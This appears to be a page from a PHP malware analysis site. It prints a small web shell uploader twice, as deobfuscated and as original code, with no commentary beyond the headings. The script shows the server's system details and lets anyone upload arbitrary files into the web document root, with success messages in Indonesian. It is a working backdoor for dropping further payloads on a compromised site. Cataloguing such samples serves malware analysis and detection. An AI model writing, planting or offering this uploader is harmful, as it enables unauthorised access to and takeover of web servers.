PHP Malware Analysis

Tags

Deobfuscated code

<?php 
echo "<pre><font size='4' color='black'>" . php_uname() . "</font></pre>";
echo "<form method='post' enctype='multipart/form-data'>\r      <input type='file' name='file'>\r      <input type='submit' name='upload' value='Upload'>\r      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['file']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses ~> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if (@copy($_FILES['file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            echo "Gagal";
        }
    }
}
?>	</body>

Original code

<?php
echo "<pre><font size='4' color='black'>".php_uname()."</font></pre>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses ~> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if(@copy($_FILES['file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            echo "Gagal";
        }
    }
}
?>
	</body>